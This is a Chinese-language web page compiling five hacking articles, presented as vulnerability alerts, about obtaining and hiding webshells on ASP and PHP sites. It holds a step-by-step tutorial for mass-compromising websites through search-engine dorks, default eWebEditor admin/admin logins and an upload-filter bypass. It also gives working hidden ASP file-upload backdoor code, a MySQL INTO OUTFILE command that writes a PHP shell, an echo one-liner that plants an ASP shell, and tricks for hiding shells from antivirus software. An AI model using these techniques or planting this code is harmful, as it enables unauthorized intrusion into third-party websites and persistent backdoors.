玩一场webshell游戏漏洞预警

时间:2023-06-16 07:37:38 其他范文 收藏本文 下载本文

玩一场webshell游戏漏洞预警(共5篇)由网友“你留在盛夏”投稿提供,下面给大家分享玩一场webshell游戏漏洞预警,欢迎阅读!

玩一场webshell游戏漏洞预警

篇1:玩一场webshell游戏漏洞预警

向 x档案投了稿,两个月了,还没选上,现在就发出来了

随便看一下吧,文章不怎么样,别见笑,图片是缩小的,点一下图片就可以看大图了

玩一场webshell游戏

大漠(baiker)

现在许多的小菜,说起抓鸡,就要来搞webshell,但是对于小菜来说,显得比较为难。虽然说每期都介绍了一些漏洞的利用工具。可能有一些,但是有大多数的“有良心”的大哥给挂马了。说不定你的机子就给马给“吓死了“。

还有就是网上翻版的教程,什么“or”漏洞,挖掘机挖上传页面什么的,或许你就因此”中马率“很高,说真的网上的一些教程都是千篇 一律的,既费时间,有搞不了多少webshell。现在我们来自己动手找webshell。

一.下载源码

找一些下载量大的网站去下载asp源码,尤其是可以搜索源码简介的网站,比如说找在线编辑器什么的,我们可以到www.zzcode.com和cncode去下载,找一个人气好,下载量大的网站整站程序。现在我们来看一下有一个向日葵整站程序,我是用ewebeditor搜索的,看点击人数有207497,(图1)下载量我想一定不是很差的,算是下载的有80%,就有16万了

,算用来建站的有80%中的50%,那么也有8万了,算是有管理员改了默认页面的,也有好几万的了,说起来,数量还是挺可观的了,嘿嘿................

二.本地架设asp环境

下载好源码后,就该来架设asp环境了。我们下载asp旋风小子。NEXT一路下去,单击完成,咦,怎么办呢?(图2)

那么我们就去C:\Program Files\小旋风AspWebServer目录找到main.box,用记事本打开,把80改为任意系统没有用的端口,如8000.文件--保存,就可以了,(图3)

首先试验一下,桌面启动AspWebserver,托盘会一闪一闪的,输入127.1:8000/index.asp,成功了。(图4)

然后将源码的根目录复制到wwwroot目录里,同时覆盖原来的测试文件index.asp,同样输入127.1:8000/index.asp就可以看到这向日葵整站程序的首页了,界面不是太难看,

(图5)

用浏览器的viewpage功能看一下页面的链接情况,看到了一个特殊的,more.asp?typeid 记下来,(图6)

再看一下页面的版权什么的,有-2008 管理入口(图7)

三.to get webshell

现在开始开工了。刚才在主页找到了向日葵系统的主要特征,现在就来google一下,inurl:“more.asp?typeid”= 2004-2008 管理入口 狂晕,才450项,(图8)

不过足够了,成功率一般是90%左右,先来搞一个就随便拿一网站来来测试,就拿我们的地球网站吧,呵呵。把more.asp及后面的改为eWebEditor/admin_login.asp,也就是把www.xpxx.cn/jb/mmj/more.asp?typeid=28改为www.xpxx.cn/jb/mmj/eWebEditor/admin_login.asp,(图9)

默认密码进去了,相信大家都知道怎么去拿webshell了。(图10)

首先去拷贝一样式,进入设置,将图片的上传格式加上aaspsp,过滤后就是asp格式了,然后去预览,点击图片上传,asp木马就可以上传了,单击“代码”,就可以看到马的地址了。(图11-12)

现在有google工具来搞一下,这是我一朋友写的,功能虽然不是太全,但是比起simplegoogle(以前介绍过)来说要好点,simplegoogle不能去除替换好后的重复的url地址。我们来动手来一下关键字出输入inurl:“more.asp?typeid”= 2004-2008 管理入口,将more.asp替换为ewebeditor/admin_login.asp,这是默认的ewebeditor后台,用户和密码是admin/admin,导出来,随便拿一个测试就可以了,是不是挺方便的?

四.小结

找webshell还是自己动手的好,虽然说这方法用来抓鸡挺快的,不过还是自己能找网站程序的漏洞,并且能够编写利用工具才是王道,自己写一个0day,然后发布出去,做做大虾的滋味,岂不快哉?

篇2:隐藏的WEBSHELL漏洞预警

<%if request.QueryString(“hac”)=“ker” then

a=Request.TotalBytes:if a Then b=“adodb.stream”:Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB

(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-

3:h.Position=0:h.type=2:h.CharSet=“BIG5”:i=h.Readtext:h.close:j=mid(i,InstrRev(i,“\”)+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-

2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%>

type=submit>

<%end if%>

表面看是没什么区别的 这就是隐藏的WEBSHELL

只要这样:login.asp?hac=ker

篇3:GET PHPCMS WEBSHELL漏洞预警

进去后

Create TABLE b (cmd text NOT NULL);

Insert INTO b (cmd) VALUES('

//在字段cmd中插入一句话木马,木马内容为

前3句都≈葱谐晒ψ詈笠痪渲葱泻笙允究瞻

select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';

篇4:旁注Echo出目标站WebShell漏洞预警

命令格式

Echo 语句 >目标站绝对目录

例如:

echo ^<^%execute request(“0”)^%^>>D:\03389.com\wwwroot\YingMu.asp

这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥

篇5:三种隐藏Webshell的方法漏洞预警

作者:普瑞斯特

第一种:

在我们要做手脚的asp文件里加入如下内容

<%if request(“action”)=“ok” then%>

shell代码插在这里

<%end if%>

访问的时候在你作手脚的asp文件后面加上?action=ok,即可

第二种:

在我们要做手脚的asp文件里加入如下内容

<%

on error resume next

strFileName = Request.QueryString(“filer”)

set objStream = Server.createObject(“ABODB.Stream”)

objStream.Type = 1

objStream.Open

objStream.LoadFromFile strFileName

objStream.SaveToFile Server.mappath(“hacksb.asp”),2

%>

访问的时候在做手脚的asp文件后面加上?filer=xxx,

xxx为你本地上传的一个路径如C:\hacksb.asp,

上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp

第三种:

前提得到system权限,

进入网站目录下一层

mkdir s…

copy hacksb.asp s…/

这样杀毒软件找不到的

访问网站/s…/hacksb.asp即可

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警

有道Chrome浏览器划词插件xss漏洞漏洞预警

dedecms 补出来的一个鸡肋漏洞漏洞预警

AWStats 6.4及以下版本多个漏洞以及分析

ideacms文章管理系统漏洞及修复

扩展思维新方法后台拿shell

PHPzendstrtod函数浮点值拒绝服务漏洞及修复

Bambook某频道SQL注射漏洞及修复

一次意外突破安全狗拿Shell

Discuz XSS得webshell脚本安全

玩一场webshell游戏漏洞预警
《玩一场webshell游戏漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【玩一场webshell游戏漏洞预警(共5篇)】相关文章:

FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警2023-08-07

一个防注入的小白错误千博企业程序漏洞预警2022-09-25

教你做服务级的木马后门2023-07-09

确保PHP应用程序的安全[2]WEB安全2022-04-30

NC反弹CMDSHELL提权总结2022-12-15

linux当mysql以root权限登录时提权网站安全2023-08-17

IIS Web服务器易忽视的六大基本安全风险2023-04-08

NFS服务器安全的解析和解决2024-04-10

科讯CMS V7.0 安全设置说明详解2023-08-19

从曲折到成功的实例入侵思路2023-01-14

点击下载本文文档